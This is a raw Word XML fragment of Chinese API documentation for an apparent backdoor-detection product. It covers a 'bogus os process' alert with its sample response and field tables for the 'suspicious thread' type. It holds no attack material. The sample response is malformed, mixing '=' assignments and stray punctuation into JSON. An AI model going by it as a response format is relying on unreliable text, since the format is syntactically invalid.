              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007A5BED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B2308D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A169371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00000006",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": "bogus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "parent": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Windows",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1232,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527214398,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Windows\\explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "item": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Program Files\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F233B81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="_Toc115166315"/>
      <w:bookmarkStart w:id="486" w:name="后门类型可疑线程"/>
      <w:bookmarkEnd w:id="482"/>
      <w:bookmarkEnd w:id="484"/>
      <w:r>
        <w:t>后门类型：可疑线程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w14:paraId="65AE9B74"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1420"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1276B75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68E97F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5767DA7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46358A1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F001D74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41285E2A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F647A64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB83CD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="430327AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B15DF67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03412B7D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B152E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>thread_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C5C24D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ABBFD21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18EAD02E" w14:textId="3B945753" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>线程信息，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "threadinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>thread_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AD5E5C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762E056B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E92BDC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E866476" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C8EA6B" w14:textId="44E6E3DE" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程信息，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "processinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>process_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78A2022F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADC29FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B43483D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3745FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46850873" w14:textId="68C0A645" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块信息，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "moduleinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>module_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A3AC02E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="_Toc115166316"/>
      <w:bookmarkStart w:id="488" w:name="threadinfo数据结构"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thread_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1844"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="6027"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AAFDD6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AEB8F56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E69BFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFB89F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E873D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73E72845" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67CDDFBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>thread_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600CF9EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDCCFA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E16988C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>线程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="092D7FDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0600D130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6865C420" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2321E77A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66BA03B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CC60DCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="318F08D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wait_reason</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57530BDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27FA8BAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51CD51C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>等待原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DFAAF4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="650BCC75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10AF88B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="391B75CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
